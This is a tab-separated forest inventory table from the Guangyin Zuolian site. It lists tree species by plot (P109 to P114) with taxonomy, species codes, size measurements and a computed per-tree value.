Guangyin Zuolian	2	P109	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	4.5	3.8	0.00541185
Guangyin Zuolian	2	P110	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2.5	0.7	0.00014825
Guangyin Zuolian	2	P110	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	2	3	1.8	0.000650978
Guangyin Zuolian	2	P110	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	2.5	3.5	3	0.00115149
Guangyin Zuolian	2	P110	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	7	6	4.5	0.0135042
Guangyin Zuolian	2	P110	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	8	7	5	0.0201917
Guangyin Zuolian	2	P110	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	3.5	1.6	0.000757716
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	3.5	3	0.00422516
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	4	3	0.00317108
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	7	3.5	0.0157184
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	15	9	7	0.0840793
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	10	5	0.0118828
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	10	6	0.0167271
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	10	6	0.0286909
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	11	9	0.0572666
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	11	8	0.0674177
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	17	12	7	0.141155
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	18	12	9	0.157128
Guangyin Zuolian	2	P110	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	18	12	8	0.157128
Guangyin Zuolian	2	P110	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.5	0.7	0.0003289
Guangyin Zuolian	2	P110	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2	0.5	0.000254566
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	3	2	0.00238863
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	5	3	0.00600364
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	6	5	0.00718464
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	6	3	0.0135042
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	6.5	3	0.0109433
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	7	6	0.00836267
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	7	2.5	0.0201917
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	7	1.5	0.0201917
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	9	6	0.0150783
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	9	7	0.0150783
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	9	6	0.0201331
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	10	7	0.0286909
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	10	6	0.0713181
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	11	8	0.0674177
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	11	3	0.129562
Guangyin Zuolian	2	P110	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	12	3	0.141155
Guangyin Zuolian	2	P110	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1	1.5	1	8.96359e-05
Guangyin Zuolian	2	P110	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1	1.5	1	8.96359e-05
Guangyin Zuolian	2	P110	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	3.5	1.5	0.00278028
Guangyin Zuolian	2	P110	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6.5	2.5	0.0146119
Guangyin Zuolian	2	P110	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	2	0.0201917
Guangyin Zuolian	2	P110	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	2	0.000650978
Guangyin Zuolian	2	P110	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	3	0.5	0.00362997
Guangyin Zuolian	2	P110	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3.5	2	0.000757716
Guangyin Zuolian	2	P111	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	4	6.5	5	0.00511552
Guangyin Zuolian	2	P111	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	10	8	0.0932735
Guangyin Zuolian	2	P111	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	2.5	2	0.000543971
Guangyin Zuolian	2	P111	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	3.5	2	0.00162093
Guangyin Zuolian	2	P111	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	4	4.5	2	0.00356116
Guangyin Zuolian	2	P111	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	6	6	3	0.0101137
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	3	2.5	0.00238863
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	5	4	0.00600364
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	5.5	5	0.00433941
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	6	4	0.0173473
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	6	4	0.0263625
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	7	6	0.0251831
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	8	6	0.0349983
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	9	7	0.0393034
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	14	10	6	0.0819525
Guangyin Zuolian	2	P111	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	23	11	8	0.228397
Guangyin Zuolian	2	P111	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	2	3	2.5	0.000650978
Guangyin Zuolian	2	P111	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	2	3	2.5	0.000650978
Guangyin Zuolian	2	P111	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	3	3	2.5	0.0013926
Guangyin Zuolian	2	P111	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	3	4	3	0.00184878
Guangyin Zuolian	2	P111	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	5	4	3	0.00481906
Guangyin Zuolian	2	P111	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	13	5	4	0.0360328
Guangyin Zuolian	2	P111	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	6.5	5	0.0187703
Guangyin Zuolian	2	P111	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	1.5	0.000543971
Guangyin Zuolian	2	P111	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	10	8	6.5	0.0349983
Guangyin Zuolian	2	P111	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	23	12	11	0.248834
Guangyin Zuolian	2	P111	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	2	2.5	0.5	0.000543971
Guangyin Zuolian	2	P111	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	2	2.5	0.5	0.000543971
Guangyin Zuolian	2	P111	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	2	4	3	0.000864223
Guangyin Zuolian	2	P111	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	2	4	3	0.000864223
Guangyin Zuolian	2	P111	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	7	5.5	4	0.012395
Guangyin Zuolian	2	P111	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	5	6	5	0.00718464
Guangyin Zuolian	2	P111	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	7	6.5	5	0.0146119
Guangyin Zuolian	2	P111	Styracaceae	Styrax	Styrax suberifolia Hook. et Arn.	STYSUB	3	6	5	0.00275631
Guangyin Zuolian	2	P111	Styracaceae	Styrax	Styrax suberifolia Hook. et Arn.	STYSUB	3	6	5	0.00275631
Guangyin Zuolian	2	P111	Styracaceae	Styrax	Styrax suberifolia Hook. et Arn.	STYSUB	3	6	5	0.00275631
Guangyin Zuolian	2	P111	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4	3	0.000864223
Guangyin Zuolian	2	P111	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	5	4	0.00230323
Guangyin Zuolian	2	P112	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	4	4	3	0.00317108
Guangyin Zuolian	2	P112	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	2.5	1.4	0.00116368
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	4.5	3	0.0020762
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	4.5	3.5	0.00356116
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	5.5	4	0.00433941
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	6	4	0.00718464
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	6.5	4.5	0.007774
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	6.5	5	0.0401542
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	7	2	0.0431948
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	7.5	6	0.039271
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	9	4	0.0553266
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	10	5	0.0521352
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	26	13	1.6	0.338853
Guangyin Zuolian	2	P112	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	4.5	3	0.00541185
Guangyin Zuolian	2	P112	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	5	4	0.00845122
Guangyin Zuolian	2	P112	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	12	6.5	5	0.0401542
Guangyin Zuolian	2	P112	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	12	6.5	2.5	0.0401542
Guangyin Zuolian	2	P112	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	15	7	3	0.0656427
Guangyin Zuolian	2	P112	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	5	6.5	5	0.007774
Guangyin Zuolian	2	P112	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	20	11.5	5	0.183597
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus oculodracontis Chun	MACOCU	4	4	1.6	0.00317108
Guangyin Zuolian	2	P112	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	3	3.5	3	0.00162093
Guangyin Zuolian	2	P112	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	4	5	1.7	0.00395057
Guangyin Zuolian	2	P112	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	5	5.5	1.6	0.00659455
Guangyin Zuolian	2	P112	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	5	2	0.00230323
Guangyin Zuolian	2	P112	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	7	2.5	0.00836267
Guangyin Zuolian	2	P112	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	22	11	6	0.210128
Guangyin Zuolian	2	P112	Lauraceae	Machilus	Machilus pauhoi Kanehira	MACPAU	5	6	3	0.00718464
Guangyin Zuolian	2	P112	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	3	1.5	0.0013926
Guangyin Zuolian	2	P112	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	4	2.5	0.00184878
Guangyin Zuolian	2	P112	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	4	2	1.4	0.00160216
Guangyin Zuolian	2	P112	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	4	4	3	0.00317108
Guangyin Zuolian	2	P112	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	6	5.5	3.5	0.00928302
Guangyin Zuolian	2	P112	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3	5.5	3	0.00252993
Guangyin Zuolian	2	P112	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	6	3	0.00472771
Guangyin Zuolian	2	P112	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	10	7.5	3	0.0328428
Guangyin Zuolian	2	P112	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	8	8	5	0.0230299
Guangyin Zuolian	2	P112	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	5	2.5	0.00845122
Guangyin Zuolian	2	P112	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	4	4	2.5	0.00317108
Guangyin Zuolian	2	P112	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	4	4.5	2	0.00356116
Guangyin Zuolian	2	P112	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	5	5	3	0.00600364
Guangyin Zuolian	2	P112	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	6.5	5	0.0109433
Guangyin Zuolian	2	P112	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	4	0.0201917
Guangyin Zuolian	2	P112	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	1.4	0.000650978
Guangyin Zuolian	2	P112	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	2	0.000650978
Guangyin Zuolian	2	P112	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	4	1.5	0.00317108
Guangyin Zuolian	2	P112	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	4	2.5	0.00317108
Guangyin Zuolian	2	P112	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	5.5	1.8	0.00433941
Guangyin Zuolian	2	P112	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	5.5	3	0.00433941
Guangyin Zuolian	2	P113	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	6	9	6	0.0150783
Guangyin Zuolian	2	P113	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	7	10	6	0.0223347
Guangyin Zuolian	2	P113	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	8	10	6	0.0286909
Guangyin Zuolian	2	P113	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	9	11	7	0.0393053
Guangyin Zuolian	2	P113	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	2	4	3	0.000864223
Guangyin Zuolian	2	P113	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	2	4.5	3	0.00097053
Guangyin Zuolian	2	P113	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	17	10	6	0.117952
Guangyin Zuolian	2	P113	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	22	13	7	0.247709
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	4	2	0.00184878
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	1.5	3	1	0.000379528
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2	4.5	2	0.00097053
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	4.5	3	0.00356116
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	5.5	3	0.00659455
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	6	4	0.00472771
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	7	4	0.00550289
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	10	6	0.0613767
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	13	10	2.5	0.0713181
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	16	11	7	0.115637
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	0.4	0.000118999
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	0.7	0.000118999
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2	1	0.000254566
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	0.5	0.00043664
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.3	1.5	0.000292136
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2.5	0.5	0.00014825
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.5	1.5	0.000317142
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	0.5	0.000543971
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	1	0.000543971
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	1	0.000543971
Guangyin Zuolian	2	P113	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	0.7	0.000543971
Guangyin Zuolian	2	P113	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1	2.5	1.8	0.00014825
Guangyin Zuolian	2	P113	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	6.5	1.8	0.0146119
Guangyin Zuolian	2	P113	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	8	5	0.0134267
Guangyin Zuolian	2	P113	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	9	5	0.118357
Guangyin Zuolian	2	P113	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	11	4	0.0783376
Guangyin Zuolian	2	P113	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	11	7	0.129562
Guangyin Zuolian	2	P113	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	28	12	3	0.359861
Guangyin Zuolian	2	P113	Lauraceae	Machilus	Machilus pauhoi Kanehira	MACPAU	5	7	3	0.00836267
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1.5	2.5	1.5	0.000317142
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	3	2	0.000650978
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1	4.5	2.5	0.000264501
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	5	3	0.00107666
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	5	3	0.00107666
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	5	2.5	0.00107666
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	6	3	0.00275631
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	6.5	3	0.00511552
Guangyin Zuolian	2	P113	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	7	6.5	3	0.0146119
Guangyin Zuolian	2	P113	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	2	4	2	0.000864223
Guangyin Zuolian	2	P113	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7	3.5	0.0157184
Guangyin Zuolian	2	P113	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	3	0.0201917
Guangyin Zuolian	2	P113	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	5	3	0.00107666
Guangyin Zuolian	2	P113	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	7	7	2	0.0157184
Guangyin Zuolian	2	P113	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	8	5	0.0134267
Guangyin Zuolian	2	P114	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	20	9	0.6	0.144215
Guangyin Zuolian	2	P114	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	2.1	0.7	0.00168103
Guangyin Zuolian	2	P114	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	1.5	2	1.7	0.000254566
Guangyin Zuolian	2	P114	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	2	1.8	0.000934077
Guangyin Zuolian	2	P114	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	5	3	0.00395057
Guangyin Zuolian	2	P114	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	7	0.8	0.0431948
Guangyin Zuolian	2	P114	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	9	8.2	0.0553266
Guangyin Zuolian	2	P114	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	22	9	7.2	0.172442
Guangyin Zuolian	2	P114	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	7	8	3	0.0179278
Guangyin Zuolian	2	P114	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	10	9	8	0.0393034
Guangyin Zuolian	2	P114	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	15	10	3.8	0.0932735
Guangyin Zuolian	2	P114	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	18	11	4.5	0.144222
Guangyin Zuolian	2	P114	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	0.8	0.6	0.00017708
Guangyin Zuolian	2	P114	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	1.5	0.6	0.000126179
Guangyin Zuolian	2	P114	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.6	0.9	0.000204338
Guangyin Zuolian	2	P114	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.6	0.4	0.000350486
Guangyin Zuolian	2	P114	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	4	1.8	0.2	0.00144423
Guangyin Zuolian	2	P114	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	8	8.5	7	0.024447
Guangyin Zuolian	2	P114	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	22	12	10.2	0.22893
Guangyin Zuolian	2	P114	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	3	2	0.9	0.000934077
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	5	1.8	0.00230323
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	6	1.2	0.03711
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	7.5	4	0.0216115
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	8	2	0.00365921
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	8	3	0.0748697
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	8.5	4.5	0.024447
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	9	4.5	0.0107114
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	9	4	0.0393034
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	9	8	0.0553266
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	9	7.5	0.0553266
